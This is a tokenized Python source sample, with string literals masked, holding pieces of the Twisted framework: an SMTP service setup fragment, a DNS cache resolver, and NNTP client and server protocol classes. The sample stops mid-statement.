service ) <EOL> if config [ '<STR_LIT>' ] : <EOL> f = smtpFactory ( ) <EOL> if config [ '<STR_LIT>' ] : <EOL> f . domain = config [ '<STR_LIT>' ] <EOL> f . fArgs = ( f . domain , ) <EOL> if config [ '<STR_LIT>' ] : <EOL> f . fArgs = ( None , None ) + f . fArgs <EOL> for endpoint in config [ '<STR_LIT>' ] : <EOL> svc = internet . StreamServerEndpointService ( endpoint , f ) <EOL> svc . setServiceParent ( config . service ) <EOL> return config . service </s>
<s> from zope . interface import implements <EOL> from twisted . names import dns , common <EOL> from twisted . python import failure , log <EOL> from twisted . internet import interfaces , defer <EOL> class CacheResolver ( common . ResolverBase ) : <EOL> """<STR_LIT>""" <EOL> implements ( interfaces . IResolver ) <EOL> cache = None <EOL> def __init__ ( self , cache = None , verbose = <NUM_LIT:0> , reactor = None ) : <EOL> common . ResolverBase . __init__ ( self ) <EOL> self . cache = { } <EOL> self . verbose = verbose <EOL> self . cancel = { } <EOL> if reactor is None : <EOL> from twisted . internet import reactor <EOL> self . _reactor = reactor <EOL> if cache : <EOL> for query , ( seconds , payload ) in cache . items ( ) : <EOL> self . cacheResult ( query , payload , seconds ) <EOL> def __setstate__ ( self , state ) : <EOL> self . __dict__ = state <EOL> now = self . _reactor . seconds ( ) <EOL> for ( k , ( when , ( ans , add , ns ) ) ) in self . cache . items ( ) : <EOL> diff = now - when <EOL> for rec in ans + add + ns : <EOL> if rec . ttl < diff : <EOL> del self . cache [ k ] <EOL> break <EOL> def __getstate__ ( self ) : <EOL> for c in self . cancel . values ( ) : <EOL> c . cancel ( ) <EOL> self . cancel . clear ( ) <EOL> return self . __dict__ <EOL> def _lookup ( self , name , cls , type , timeout ) : <EOL> now = self . _reactor . seconds ( ) <EOL> q = dns . Query ( name , type , cls ) <EOL> try : <EOL> when , ( ans , auth , add ) = self . cache [ q ] <EOL> except KeyError : <EOL> if self . verbose > <NUM_LIT:1> : <EOL> log . msg ( '<STR_LIT>' + repr ( name ) ) <EOL> return defer . fail ( failure . Failure ( dns . DomainError ( name ) ) ) <EOL> else : <EOL> if self . verbose : <EOL> log . msg ( '<STR_LIT>' + repr ( name ) ) <EOL> diff = now - when <EOL> try : <EOL> result = ( <EOL> [ dns . RRHeader ( str ( r . name ) , r . type , r . cls , r . ttl - diff , <EOL> r . payload ) for r in ans ] , <EOL> [ dns . RRHeader ( str ( r . name ) , r . type , r . cls , r . 
ttl - diff , <EOL> r . payload ) for r in auth ] , <EOL> [ dns . RRHeader ( str ( r . name ) , r . type , r . cls , r . ttl - diff , <EOL> r . payload ) for r in add ] ) <EOL> except ValueError : <EOL> return defer . fail ( failure . Failure ( dns . DomainError ( name ) ) ) <EOL> else : <EOL> return defer . succeed ( result ) <EOL> def lookupAllRecords ( self , name , timeout = None ) : <EOL> return defer . fail ( failure . Failure ( dns . DomainError ( name ) ) ) <EOL> def cacheResult ( self , query , payload , cacheTime = None ) : <EOL> """<STR_LIT>""" <EOL> if self . verbose > <NUM_LIT:1> : <EOL> log . msg ( '<STR_LIT>' % query ) <EOL> self . cache [ query ] = ( cacheTime or self . _reactor . seconds ( ) , payload ) <EOL> if query in self . cancel : <EOL> self . cancel [ query ] . cancel ( ) <EOL> s = list ( payload [ <NUM_LIT:0> ] ) + list ( payload [ <NUM_LIT:1> ] ) + list ( payload [ <NUM_LIT:2> ] ) <EOL> if s : <EOL> m = s [ <NUM_LIT:0> ] . ttl <EOL> for r in s : <EOL> m = min ( m , r . ttl ) <EOL> else : <EOL> m = <NUM_LIT:0> <EOL> self . cancel [ query ] = self . _reactor . callLater ( m , self . clearEntry , query ) <EOL> def clearEntry ( self , query ) : <EOL> del self . cache [ query ] <EOL> del self . cancel [ query ] </s>
<s> """<STR_LIT>""" <EOL> import time <EOL> from twisted . protocols import basic <EOL> from twisted . python import log <EOL> def parseRange ( text ) : <EOL> articles = text . split ( '<STR_LIT:->' ) <EOL> if len ( articles ) == <NUM_LIT:1> : <EOL> try : <EOL> a = int ( articles [ <NUM_LIT:0> ] ) <EOL> return a , a <EOL> except ValueError : <EOL> return None , None <EOL> elif len ( articles ) == <NUM_LIT:2> : <EOL> try : <EOL> if len ( articles [ <NUM_LIT:0> ] ) : <EOL> l = int ( articles [ <NUM_LIT:0> ] ) <EOL> else : <EOL> l = None <EOL> if len ( articles [ <NUM_LIT:1> ] ) : <EOL> h = int ( articles [ <NUM_LIT:1> ] ) <EOL> else : <EOL> h = None <EOL> except ValueError : <EOL> return None , None <EOL> return l , h <EOL> def extractCode ( line ) : <EOL> line = line . split ( '<STR_LIT:U+0020>' , <NUM_LIT:1> ) <EOL> if len ( line ) != <NUM_LIT:2> : <EOL> return None <EOL> try : <EOL> return int ( line [ <NUM_LIT:0> ] ) , line [ <NUM_LIT:1> ] <EOL> except ValueError : <EOL> return None <EOL> class NNTPError ( Exception ) : <EOL> def __init__ ( self , string ) : <EOL> self . string = string <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % self . string <EOL> class NNTPClient ( basic . LineReceiver ) : <EOL> MAX_COMMAND_LENGTH = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> self . currentGroup = None <EOL> self . _state = [ ] <EOL> self . _error = [ ] <EOL> self . _inputBuffers = [ ] <EOL> self . _responseCodes = [ ] <EOL> self . _responseHandlers = [ ] <EOL> self . _postText = [ ] <EOL> self . _newState ( self . _statePassive , None , self . 
_headerInitial ) <EOL> def gotAllGroups ( self , groups ) : <EOL> "<STR_LIT>" <EOL> def getAllGroupsFailed ( self , error ) : <EOL> "<STR_LIT>" <EOL> def gotOverview ( self , overview ) : <EOL> "<STR_LIT>" <EOL> def getOverviewFailed ( self , error ) : <EOL> "<STR_LIT>" <EOL> def gotSubscriptions ( self , subscriptions ) : <EOL> "<STR_LIT>" <EOL> def getSubscriptionsFailed ( self , error ) : <EOL> "<STR_LIT>" <EOL> def gotGroup ( self , group ) : <EOL> "<STR_LIT>" <EOL> def getGroupFailed ( self , error ) : <EOL> "<STR_LIT>" <EOL> def gotArticle ( self , article ) : <EOL> "<STR_LIT>" <EOL> def getArticleFailed ( self , error ) : <EOL> "<STR_LIT>" <EOL> def gotHead ( self , head ) : <EOL> "<STR_LIT>" <EOL> def getHeadFailed ( self , error ) : <EOL> "<STR_LIT>" <EOL> def gotBody ( self , info ) : <EOL> "<STR_LIT>" <EOL> def getBodyFailed ( self , body ) : <EOL> "<STR_LIT>" <EOL> def postedOk ( self ) : <EOL> "<STR_LIT>" <EOL> def postFailed ( self , error ) : <EOL> "<STR_LIT>" <EOL> def gotXHeader ( self , headers ) : <EOL> "<STR_LIT>" <EOL> def getXHeaderFailed ( self , error ) : <EOL> "<STR_LIT>" <EOL> def gotNewNews ( self , news ) : <EOL> "<STR_LIT>" <EOL> def getNewNewsFailed ( self , error ) : <EOL> "<STR_LIT>" <EOL> def gotNewGroups ( self , groups ) : <EOL> "<STR_LIT>" <EOL> def getNewGroupsFailed ( self , error ) : <EOL> "<STR_LIT>" <EOL> def setStreamSuccess ( self ) : <EOL> "<STR_LIT>" <EOL> def setStreamFailed ( self , error ) : <EOL> "<STR_LIT>" <EOL> def fetchGroups ( self ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> self . _newState ( self . _stateList , self . getAllGroupsFailed ) <EOL> def fetchOverview ( self ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> self . _newState ( self . _stateOverview , self . getOverviewFailed ) <EOL> def fetchSubscriptions ( self ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> self . _newState ( self . _stateSubscriptions , self . 
getSubscriptionsFailed ) <EOL> def fetchGroup ( self , group ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( '<STR_LIT>' % ( group , ) ) <EOL> self . _newState ( None , self . getGroupFailed , self . _headerGroup ) <EOL> def fetchHead ( self , index = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( '<STR_LIT>' % ( index , ) ) <EOL> self . _newState ( self . _stateHead , self . getHeadFailed ) <EOL> def fetchBody ( self , index = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( '<STR_LIT>' % ( index , ) ) <EOL> self . _newState ( self . _stateBody , self . getBodyFailed ) <EOL> def fetchArticle ( self , index = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( '<STR_LIT>' % ( index , ) ) <EOL> self . _newState ( self . _stateArticle , self . getArticleFailed ) <EOL> def postArticle ( self , text ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( '<STR_LIT:POST>' ) <EOL> self . _newState ( None , self . postFailed , self . _headerPost ) <EOL> self . _postText . append ( text ) <EOL> def fetchNewNews ( self , groups , date , distributions = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> date , timeStr = time . strftime ( '<STR_LIT>' , time . gmtime ( date ) ) . split ( ) <EOL> line = '<STR_LIT>' % ( date , timeStr , distributions ) <EOL> groupPart = '<STR_LIT>' <EOL> while len ( groups ) and len ( line ) + len ( groupPart ) + len ( groups [ - <NUM_LIT:1> ] ) + <NUM_LIT:1> < NNTPClient . MAX_COMMAND_LENGTH : <EOL> group = groups . pop ( ) <EOL> groupPart = groupPart + '<STR_LIT:U+002C>' + group <EOL> self . sendLine ( line % ( groupPart , ) ) <EOL> self . _newState ( self . _stateNewNews , self . getNewNewsFailed ) <EOL> if len ( groups ) : <EOL> self . fetchNewNews ( groups , date , distributions ) <EOL> def fetchNewGroups ( self , date , distributions ) : <EOL> """<STR_LIT>""" <EOL> date , timeStr = time . strftime ( '<STR_LIT>' , time . gmtime ( date ) ) . split ( ) <EOL> self . 
sendLine ( '<STR_LIT>' % ( date , timeStr , distributions ) ) <EOL> self . _newState ( self . _stateNewGroups , self . getNewGroupsFailed ) <EOL> def fetchXHeader ( self , header , low = None , high = None , id = None ) : <EOL> """<STR_LIT>""" <EOL> if id is not None : <EOL> r = header + '<STR_LIT>' % ( id , ) <EOL> elif low is high is None : <EOL> r = header <EOL> elif high is None : <EOL> r = header + '<STR_LIT>' % ( low , ) <EOL> elif low is None : <EOL> r = header + '<STR_LIT>' % ( high , ) <EOL> else : <EOL> r = header + '<STR_LIT>' % ( low , high ) <EOL> self . sendLine ( '<STR_LIT>' + r ) <EOL> self . _newState ( self . _stateXHDR , self . getXHeaderFailed ) <EOL> def setStream ( self ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> self . _newState ( None , self . setStreamFailed , self . _headerMode ) <EOL> def quit ( self ) : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> self . transport . loseConnection ( ) <EOL> def _newState ( self , method , error , responseHandler = None ) : <EOL> self . _inputBuffers . append ( [ ] ) <EOL> self . _responseCodes . append ( None ) <EOL> self . _state . append ( method ) <EOL> self . _error . append ( error ) <EOL> self . _responseHandlers . append ( responseHandler ) <EOL> def _endState ( self ) : <EOL> buf = self . _inputBuffers [ <NUM_LIT:0> ] <EOL> del self . _responseCodes [ <NUM_LIT:0> ] <EOL> del self . _inputBuffers [ <NUM_LIT:0> ] <EOL> del self . _state [ <NUM_LIT:0> ] <EOL> del self . _error [ <NUM_LIT:0> ] <EOL> del self . _responseHandlers [ <NUM_LIT:0> ] <EOL> return buf <EOL> def _newLine ( self , line , check = <NUM_LIT:1> ) : <EOL> if check and line and line [ <NUM_LIT:0> ] == '<STR_LIT:.>' : <EOL> line = line [ <NUM_LIT:1> : ] <EOL> self . _inputBuffers [ <NUM_LIT:0> ] . append ( line ) <EOL> def _setResponseCode ( self , code ) : <EOL> self . _responseCodes [ <NUM_LIT:0> ] = code <EOL> def _getResponseCode ( self ) : <EOL> return self . 
_responseCodes [ <NUM_LIT:0> ] <EOL> def lineReceived ( self , line ) : <EOL> if not len ( self . _state ) : <EOL> self . _statePassive ( line ) <EOL> elif self . _getResponseCode ( ) is None : <EOL> code = extractCode ( line ) <EOL> if code is None or not ( <NUM_LIT:200> <= code [ <NUM_LIT:0> ] < <NUM_LIT> ) : <EOL> self . _error [ <NUM_LIT:0> ] ( line ) <EOL> self . _endState ( ) <EOL> else : <EOL> self . _setResponseCode ( code ) <EOL> if self . _responseHandlers [ <NUM_LIT:0> ] : <EOL> self . _responseHandlers [ <NUM_LIT:0> ] ( code ) <EOL> else : <EOL> self . _state [ <NUM_LIT:0> ] ( line ) <EOL> def _statePassive ( self , line ) : <EOL> log . msg ( '<STR_LIT>' % line ) <EOL> def _passiveError ( self , error ) : <EOL> log . err ( '<STR_LIT>' % ( error , ) ) <EOL> def _headerInitial ( self , ( code , message ) ) : <EOL> if code == <NUM_LIT:200> : <EOL> self . canPost = <NUM_LIT:1> <EOL> else : <EOL> self . canPost = <NUM_LIT:0> <EOL> self . _endState ( ) <EOL> def _stateList ( self , line ) : <EOL> if line != '<STR_LIT:.>' : <EOL> data = filter ( None , line . strip ( ) . split ( ) ) <EOL> self . _newLine ( ( data [ <NUM_LIT:0> ] , int ( data [ <NUM_LIT:1> ] ) , int ( data [ <NUM_LIT:2> ] ) , data [ <NUM_LIT:3> ] ) , <NUM_LIT:0> ) <EOL> else : <EOL> self . gotAllGroups ( self . _endState ( ) ) <EOL> def _stateOverview ( self , line ) : <EOL> if line != '<STR_LIT:.>' : <EOL> self . _newLine ( filter ( None , line . strip ( ) . split ( ) ) , <NUM_LIT:0> ) <EOL> else : <EOL> self . gotOverview ( self . _endState ( ) ) <EOL> def _stateSubscriptions ( self , line ) : <EOL> if line != '<STR_LIT:.>' : <EOL> self . _newLine ( line . strip ( ) , <NUM_LIT:0> ) <EOL> else : <EOL> self . gotSubscriptions ( self . _endState ( ) ) <EOL> def _headerGroup ( self , ( code , line ) ) : <EOL> self . gotGroup ( tuple ( line . split ( ) ) ) <EOL> self . _endState ( ) <EOL> def _stateArticle ( self , line ) : <EOL> if line != '<STR_LIT:.>' : <EOL> if line . 
startswith ( '<STR_LIT:.>' ) : <EOL> line = line [ <NUM_LIT:1> : ] <EOL> self . _newLine ( line , <NUM_LIT:0> ) <EOL> else : <EOL> self . gotArticle ( '<STR_LIT:\n>' . join ( self . _endState ( ) ) + '<STR_LIT:\n>' ) <EOL> def _stateHead ( self , line ) : <EOL> if line != '<STR_LIT:.>' : <EOL> self . _newLine ( line , <NUM_LIT:0> ) <EOL> else : <EOL> self . gotHead ( '<STR_LIT:\n>' . join ( self . _endState ( ) ) ) <EOL> def _stateBody ( self , line ) : <EOL> if line != '<STR_LIT:.>' : <EOL> if line . startswith ( '<STR_LIT:.>' ) : <EOL> line = line [ <NUM_LIT:1> : ] <EOL> self . _newLine ( line , <NUM_LIT:0> ) <EOL> else : <EOL> self . gotBody ( '<STR_LIT:\n>' . join ( self . _endState ( ) ) + '<STR_LIT:\n>' ) <EOL> def _headerPost ( self , ( code , message ) ) : <EOL> if code == <NUM_LIT> : <EOL> self . transport . write ( self . _postText [ <NUM_LIT:0> ] . replace ( '<STR_LIT:\n>' , '<STR_LIT:\r\n>' ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> if self . _postText [ <NUM_LIT:0> ] [ - <NUM_LIT:1> : ] != '<STR_LIT:\n>' : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> self . sendLine ( '<STR_LIT:.>' ) <EOL> del self . _postText [ <NUM_LIT:0> ] <EOL> self . _newState ( None , self . postFailed , self . _headerPosted ) <EOL> else : <EOL> self . postFailed ( '<STR_LIT>' % ( code , message ) ) <EOL> self . _endState ( ) <EOL> def _headerPosted ( self , ( code , message ) ) : <EOL> if code == <NUM_LIT> : <EOL> self . postedOk ( ) <EOL> else : <EOL> self . postFailed ( '<STR_LIT>' % ( code , message ) ) <EOL> self . _endState ( ) <EOL> def _stateXHDR ( self , line ) : <EOL> if line != '<STR_LIT:.>' : <EOL> self . _newLine ( line . split ( ) , <NUM_LIT:0> ) <EOL> else : <EOL> self . _gotXHeader ( self . _endState ( ) ) <EOL> def _stateNewNews ( self , line ) : <EOL> if line != '<STR_LIT:.>' : <EOL> self . _newLine ( line , <NUM_LIT:0> ) <EOL> else : <EOL> self . gotNewNews ( self . 
_endState ( ) ) <EOL> def _stateNewGroups ( self , line ) : <EOL> if line != '<STR_LIT:.>' : <EOL> self . _newLine ( line , <NUM_LIT:0> ) <EOL> else : <EOL> self . gotNewGroups ( self . _endState ( ) ) <EOL> def _headerMode ( self , ( code , message ) ) : <EOL> if code == <NUM_LIT> : <EOL> self . setStreamSuccess ( ) <EOL> else : <EOL> self . setStreamFailed ( ( code , message ) ) <EOL> self . _endState ( ) <EOL> class NNTPServer ( basic . LineReceiver ) : <EOL> COMMANDS = [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:POST>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> ] <EOL> def __init__ ( self ) : <EOL> self . servingSlave = <NUM_LIT:0> <EOL> def connectionMade ( self ) : <EOL> self . inputHandler = None <EOL> self . currentGroup = None <EOL> self . currentIndex = None <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def lineReceived ( self , line ) : <EOL> if self . inputHandler is not None : <EOL> self . inputHandler ( line ) <EOL> else : <EOL> parts = line . strip ( ) . split ( ) <EOL> if len ( parts ) : <EOL> cmd , parts = parts [ <NUM_LIT:0> ] . upper ( ) , parts [ <NUM_LIT:1> : ] <EOL> if cmd in NNTPServer . COMMANDS : <EOL> func = getattr ( self , '<STR_LIT>' % cmd ) <EOL> try : <EOL> func ( * parts ) <EOL> except TypeError : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> log . msg ( "<STR_LIT>" ) <EOL> log . msg ( "<STR_LIT>" , line ) <EOL> log . deferr ( ) <EOL> except : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> log . msg ( "<STR_LIT>" ) <EOL> log . msg ( "<STR_LIT>" , line ) <EOL> log . deferr ( ) <EOL> else : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def do_LIST ( self , subcmd = '<STR_LIT>' , * dummy ) : <EOL> subcmd = subcmd . strip ( ) . lower ( ) <EOL> if subcmd == '<STR_LIT>' : <EOL> self . 
sendLine ( '<STR_LIT>' ) <EOL> self . sendLine ( '<STR_LIT:.>' ) <EOL> elif subcmd == '<STR_LIT>' : <EOL> defer = self . factory . backend . overviewRequest ( ) <EOL> defer . addCallbacks ( self . _gotOverview , self . _errOverview ) <EOL> log . msg ( '<STR_LIT>' ) <EOL> elif subcmd == '<STR_LIT>' : <EOL> defer = self . factory . backend . subscriptionRequest ( ) <EOL> defer . addCallbacks ( self . _gotSubscription , self . _errSubscription ) <EOL> log . msg ( '<STR_LIT>' ) <EOL> elif subcmd == '<STR_LIT>' : <EOL> defer = self . factory . backend . listRequest ( ) <EOL> defer . addCallbacks ( self . _gotList , self . _errList ) <EOL> else : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def _gotList ( self , list ) : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> for i in list : <EOL> self . sendLine ( '<STR_LIT>' % tuple ( i ) ) <EOL> self . sendLine ( '<STR_LIT:.>' ) <EOL> def _errList ( self , failure ) : <EOL> print '<STR_LIT>' , failure <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def _gotSubscription ( self , parts ) : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> for i in parts : <EOL> self . sendLine ( i ) <EOL> self . sendLine ( '<STR_LIT:.>' ) <EOL> def _errSubscription ( self , failure ) : <EOL> print '<STR_LIT>' , failure <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def _gotOverview ( self , parts ) : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> for i in parts : <EOL> self . sendLine ( i + '<STR_LIT::>' ) <EOL> self . sendLine ( '<STR_LIT:.>' ) <EOL> def _errOverview ( self , failure ) : <EOL> print '<STR_LIT>' , failure <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def do_LISTGROUP ( self , group = None ) : <EOL> group = group or self . currentGroup <EOL> if group is None : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> else : <EOL> defer = self . factory . backend . listGroupRequest ( group ) <EOL> defer . addCallbacks ( self . _gotListGroup , self . _errListGroup ) <EOL> def _gotListGroup ( self , ( group , articles ) ) : <EOL> self . 
currentGroup = group <EOL> if len ( articles ) : <EOL> self . currentIndex = int ( articles [ <NUM_LIT:0> ] ) <EOL> else : <EOL> self . currentIndex = None <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> for i in articles : <EOL> self . sendLine ( str ( i ) ) <EOL> self . sendLine ( '<STR_LIT:.>' ) <EOL> def _errListGroup ( self , failure ) : <EOL> print '<STR_LIT>' , failure <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def do_XOVER ( self , range ) : <EOL> if self . currentGroup is None : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> else : <EOL> l , h = parseRange ( range ) <EOL> defer = self . factory . backend . xoverRequest ( self . currentGroup , l , h ) <EOL> defer . addCallbacks ( self . _gotXOver , self . _errXOver ) <EOL> def _gotXOver ( self , parts ) : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> for i in parts : <EOL> self . sendLine ( '<STR_LIT:\t>' . join ( map ( str , i ) ) ) <EOL> self . sendLine ( '<STR_LIT:.>' ) <EOL> def _errXOver ( self , failure ) : <EOL> print '<STR_LIT>' , failure <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def xhdrWork ( self , header , range ) : <EOL> if self . currentGroup is None : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> else : <EOL> if range is None : <EOL> if self . currentIndex is None : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> return <EOL> else : <EOL> l = h = self . currentIndex <EOL> else : <EOL> l , h = parseRange ( range ) <EOL> if l is h is None : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> else : <EOL> return self . factory . backend . xhdrRequest ( self . currentGroup , l , h , header ) <EOL> def do_XHDR ( self , header , range = None ) : <EOL> d = self . xhdrWork ( header , range ) <EOL> if d : <EOL> d . addCallbacks ( self . _gotXHDR , self . _errXHDR ) <EOL> def _gotXHDR ( self , parts ) : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> for i in parts : <EOL> self . sendLine ( '<STR_LIT>' % i ) <EOL> self . 
sendLine ( '<STR_LIT:.>' ) <EOL> def _errXHDR ( self , failure ) : <EOL> print '<STR_LIT>' , failure <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def do_POST ( self ) : <EOL> self . inputHandler = self . _doingPost <EOL> self . message = '<STR_LIT>' <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def _doingPost ( self , line ) : <EOL> if line == '<STR_LIT:.>' : <EOL> self . inputHandler = None <EOL> group , article = self . currentGroup , self . message <EOL> self . message = '<STR_LIT>' <EOL> defer = self . factory . backend . postRequest ( article ) <EOL> defer . addCallbacks ( self . _gotPost , self . _errPost ) <EOL> else : <EOL> self . message = self . message + line + '<STR_LIT:\r\n>' <EOL> def _gotPost ( self , parts ) : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def _errPost ( self , failure ) : <EOL> print '<STR_LIT>' , failure <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def do_CHECK ( self , id ) : <EOL> d = self . factory . backend . articleExistsRequest ( id ) <EOL> d . addCallbacks ( self . _gotCheck , self . _errCheck ) <EOL> def _gotCheck ( self , result ) : <EOL> if result : <EOL> self . sendLine ( "<STR_LIT>" ) <EOL> else : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def _errCheck ( self , failure ) : <EOL> print '<STR_LIT>' , failure <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def do_TAKETHIS ( self , id ) : <EOL> self . inputHandler = self . _doingTakeThis <EOL> self . message = '<STR_LIT>' <EOL> def _doingTakeThis ( self , line ) : <EOL> if line == '<STR_LIT:.>' : <EOL> self . inputHandler = None <EOL> article = self . message <EOL> self . message = '<STR_LIT>' <EOL> d = self . factory . backend . postRequest ( article ) <EOL> d . addCallbacks ( self . _didTakeThis , self . _errTakeThis ) <EOL> else : <EOL> self . message = self . message + line + '<STR_LIT:\r\n>' <EOL> def _didTakeThis ( self , result ) : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def _errTakeThis ( self , failure ) : <EOL> print '<STR_LIT>' , failure <EOL> self . 
sendLine ( '<STR_LIT>' ) <EOL> def do_GROUP ( self , group ) : <EOL> defer = self . factory . backend . groupRequest ( group ) <EOL> defer . addCallbacks ( self . _gotGroup , self . _errGroup ) <EOL> def _gotGroup ( self , ( name , num , high , low , flags ) ) : <EOL> self . currentGroup = name <EOL> self . currentIndex = low <EOL> self . sendLine ( '<STR_LIT>' % ( num , low , high , name ) ) <EOL> def _errGroup ( self , failure ) : <EOL> print '<STR_LIT>' , failure <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def articleWork ( self , article , cmd , func ) : <EOL> if self . currentGroup is None : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> else : <EOL> if not article : <EOL> if self . currentIndex is None : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> else : <EOL> article = self . currentIndex <EOL> else : <EOL> if article [ <NUM_LIT:0> ] == '<STR_LIT:<>' : <EOL> return func ( self . currentGroup , index = None , id = article ) <EOL> else : <EOL> try : <EOL> article = int ( article ) <EOL> return func ( self . currentGroup , article ) <EOL> except ValueError : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def do_ARTICLE ( self , article = None ) : <EOL> defer = self . articleWork ( article , '<STR_LIT>' , self . factory . backend . articleRequest ) <EOL> if defer : <EOL> defer . addCallbacks ( self . _gotArticle , self . _errArticle ) <EOL> def _gotArticle ( self , ( index , id , article ) ) : <EOL> self . currentIndex = index <EOL> self . sendLine ( '<STR_LIT>' % ( index , id ) ) <EOL> s = basic . FileSender ( ) <EOL> d = s . beginFileTransfer ( article , self . transport ) <EOL> d . addCallback ( self . finishedFileTransfer ) <EOL> def finishedFileTransfer ( self , lastsent ) : <EOL> if lastsent != '<STR_LIT:\n>' : <EOL> line = '<STR_LIT>' <EOL> else : <EOL> line = '<STR_LIT:.>' <EOL> self . sendLine ( line ) <EOL> def _errArticle ( self , failure ) : <EOL> print '<STR_LIT>' , failure <EOL> self . 
sendLine ( '<STR_LIT>' ) <EOL> def do_STAT ( self , article = None ) : <EOL> defer = self . articleWork ( article , '<STR_LIT>' , self . factory . backend . articleRequest ) <EOL> if defer : <EOL> defer . addCallbacks ( self . _gotStat , self . _errStat ) <EOL> def _gotStat ( self , ( index , id , article ) ) : <EOL> self . currentIndex = index <EOL> self . sendLine ( '<STR_LIT>' % ( index , id ) ) <EOL> def _errStat ( self , failure ) : <EOL> print '<STR_LIT>' , failure <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def do_HEAD ( self , article = None ) : <EOL> defer = self . articleWork ( article , '<STR_LIT>' , self . factory . backend . headRequest ) <EOL> if defer : <EOL> defer . addCallbacks ( self . _gotHead , self . _errHead ) <EOL> def _gotHead ( self , ( index , id , head ) ) : <EOL> self . currentIndex = index <EOL> self . sendLine ( '<STR_LIT>' % ( index , id ) ) <EOL> self . transport . write ( head + '<STR_LIT:\r\n>' ) <EOL> self . sendLine ( '<STR_LIT:.>' ) <EOL> def _errHead ( self , failure ) : <EOL> print '<STR_LIT>' , failure <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def do_BODY ( self , article ) : <EOL> defer = self . articleWork ( article , '<STR_LIT>' , self . factory . backend . bodyRequest ) <EOL> if defer : <EOL> defer . addCallbacks ( self . _gotBody , self . _errBody ) <EOL> def _gotBody ( self , ( index , id , body ) ) : <EOL> self . currentIndex = index <EOL> self . sendLine ( '<STR_LIT>' % ( index , id ) ) <EOL> self . lastsent = '<STR_LIT>' <EOL> s = basic . FileSender ( ) <EOL> d = s . beginFileTransfer ( body , self . transport ) <EOL> d . addCallback ( self . finishedFileTransfer ) <EOL> def _errBody ( self , failure ) : <EOL> print '<STR_LIT>' , failure <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def do_NEXT ( self ) : <EOL> i = self . currentIndex + <NUM_LIT:1> <EOL> defer = self . factory . backend . articleRequest ( self . currentGroup , i ) <EOL> defer . addCallbacks ( self . _gotStat , self . 
_errStat ) <EOL> def do_LAST ( self ) : <EOL> i = self . currentIndex - <NUM_LIT:1> <EOL> defer = self . factory . backend . articleRequest ( self . currentGroup , i ) <EOL> defer . addCallbacks ( self . _gotStat , self . _errStat ) <EOL> def do_MODE ( self , cmd ) : <EOL> cmd = cmd . strip ( ) . upper ( ) <EOL> if cmd == '<STR_LIT>' : <EOL> self . servingSlave = <NUM_LIT:0> <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> elif cmd == '<STR_LIT>' : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> else : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def do_QUIT ( self ) : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> self . transport . loseConnection ( ) <EOL> def do_HELP ( self ) : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> self . sendLine ( '<STR_LIT:.>' ) <EOL> def do_SLAVE ( self ) : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> self . servingeSlave = 